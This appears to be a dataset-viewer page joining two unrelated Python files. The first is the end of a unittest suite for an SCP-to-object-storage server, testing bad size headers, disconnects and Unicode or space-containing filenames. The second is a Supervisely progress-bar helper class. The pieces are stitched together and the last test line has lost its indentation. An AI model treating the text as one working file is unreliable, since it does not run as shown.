        self.assertEqual(exit_status, 0)
        tail = self.channel.recv(1)
        self.assertEqual(tail, '')

    def test_file_upload_invalid_size(self):
        # A non-integer size field must be rejected with a \001 error byte.
        self.channel.exec_command('scp -t /%s/foo' % self.container)
        ack = self.channel.recv(1)
        self.assertEqual(ack, "\000")
        self.channel.sendall("C0644 not_an_integer test\n")
        ack = self.channel.recv(1)
        self.assertEqual(ack, "\001")

    def test_file_upload_error_disconnect(self):
        # Disconnecting right after a bad header must not crash the server.
        self.channel.exec_command('scp -t /%s/foo' % self.container)
        ack = self.channel.recv(1)
        self.assertEqual(ack, "\000")
        self.channel.sendall("C0644 not_an_integer foo\n")
        # shouldn't raise an exception on the server
        # FIXME: test that it doesn't happen!

    def test_file_upload_unicode(self):
        # Upload a file whose name contains a non-ASCII (UTF-8) character.
        self.channel.exec_command(u'scp -t /%s/Smiley\u263a\ file'.encode("utf-8") % self.container)
        ack = self.channel.recv(1)
        self.assertEqual(ack, "\000")
        self.channel.sendall(u"C0644 6 Smiley\u263a file\n".encode("utf-8"))
        ack = self.channel.recv(1)
        self.assertEqual(ack, "\000")
        self.channel.sendall("Hello\n")
        ack = self.channel.recv(1)
        self.assertEqual(ack, "\000")
        exit_status = self.channel.recv_exit_status()
        self.assertEqual(exit_status, 0)
        tail = self.channel.recv(1)
        self.assertEqual(tail, '')
        headers, content = self.conn.get_object(self.container, u'Smiley\u263a file')
        self.assertEqual(content, 'Hello\n')

    def test_dir_upload_unicode(self):
        # Recursive upload into a directory with a non-ASCII name.
        self.channel.exec_command(u'scp -tr /%s/Smiley\u263a\ dir'.encode("utf-8") % self.container)
        ack = self.channel.recv(1)
        self.assertEqual(ack, "\000")
        self.channel.sendall(u"D0644 6 Smiley\u263a dir\n".encode("utf-8"))
        ack = self.channel.recv(1)
        self.assertEqual(ack, "\000")
        self.channel.sendall("C0644 6 test\n")
        ack = self.channel.recv(1)
        self.assertEqual(ack, "\000")
        self.channel.sendall("Hello\n")
        ack = self.channel.recv(1)
        self.assertEqual(ack, "\000")
        self.channel.sendall("E\n")
        ack = self.channel.recv(1)
        self.assertEqual(ack, "\000")
        exit_status = self.channel.recv_exit_status()
        self.assertEqual(exit_status, 0)
        tail = self.channel.recv(1)
        self.assertEqual(tail, '')
        headers, content = self.conn.get_object(self.container, u'Smiley\u263a dir/test')
        self.assertEqual(content, 'Hello\n')

    def test_file_upload_like_scp(self):
        # Upload using the same "--" argument form a real scp client emits,
        # with a filename containing spaces.
        self.channel.exec_command('scp -t -- /%s/file with spaces.txt' % self.container)
        ack = self.channel.recv(1)
        self.assertEqual(ack, "\000")
        self.channel.sendall(u"C0644 6 file with spaces.txt\n")
        ack = self.channel.recv(1)
        self.assertEqual(ack, "\000")
        self.channel.sendall("Hello\n")
        ack = self.channel.recv(1)
        self.assertEqual(ack, "\000")
        exit_status = self.channel.recv_exit_status()
        self.assertEqual(exit_status, 0)
        tail = self.channel.recv(1)
        self.assertEqual(tail, '')
        headers, content = self.conn.get_object(self.container, 'file with spaces.txt')
        self.assertEqual(content, 'Hello\n')

    def tearDown(self):
        self.channel.close()
        self.transport.close()
        # Delete everything from the container using the API
        _, objects = self.conn.get_container(self.container)
        for obj in objects:
            self.conn.delete_object(self.container, obj["name"])
        self.conn.delete_container(self.container)
if __name__ == '__main__':
unittest.main()
|
import math
import supervisely_lib as sly
class SlyProgress:
    """Mirrors a supervisely Progress bar into task UI data fields."""

    def __init__(self, api, task_id, pbar_element_name):
        self.api = api
        self.task_id = task_id
        self.pbar_element_name = pbar_element_name
        self.pbar = None

    def refresh_params(self, desc, total, is_size=False):
        """Start a fresh progress bar and push its initial state to the UI."""
        self.pbar = sly.Progress(desc, total, is_size=is_size)
        self.refresh_progress()

    def refresh_progress(self):
        """Push the bar's current percentage, message and labels to the UI."""
        total = self.pbar.total
        # Guard against division by zero for empty/unknown totals.
        percent = math.floor(self.pbar.current * 100 / total) if total != 0 else 0
        updates = {
            "": percent,
            "Message": self.pbar.message,
            "Current": self.pbar.current_label,
            "Total": self.pbar.total_label,
            "Percent": percent,
        }
        fields = [
            {"field": f"data.{self.pbar_element_name}{suffix}", "payload": value}
            for suffix, value in updates.items()
        ]
        self.api.task.set_fields(self.task_id, fields)

    def reset_params(self):
        """Blank out every progress-related field in the UI."""
        fields = [
            {"field": f"data.{self.pbar_element_name}{suffix}", "payload": None}
            for suffix in ("", "Message", "Current", "Total", "Percent")
        ]
        self.api.task.set_fields(self.task_id, fields)

    def next_step(self):
        """Advance the bar by one iteration and sync the UI."""
        self.pbar.iter_done_report()
        self.refresh_progress()

    def upload_monitor(self, monitor, api: sly.Api, task_id, progress: sly.Progress):
        """Monitor callback: on first call seed total from the monitor,
        afterwards track bytes read; then sync the UI."""
        if progress.total == 0:
            progress.set(monitor.bytes_read, monitor.len, report=False)
        else:
            progress.set_current_value(monitor.bytes_read, report=False)
        self.refresh_progress()

    def update_progress(self, count, api: sly.Api, task_id, progress: sly.Progress):
        """Advance *progress* by *count*, clamped to what remains."""
        # hack: clamp to remaining to absorb slight size-conversion drift
        remaining = progress.total - progress.current
        progress.iters_done(min(count, remaining))
        if progress.need_report():
            progress.report_progress()
        self.refresh_progress()

    def set_progress(self, current, api: sly.Api, task_id, progress: sly.Progress):
        """Move *progress* to an absolute value via a relative update."""
        delta = current - progress.current
        self.update_progress(delta, api, task_id, progress)
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.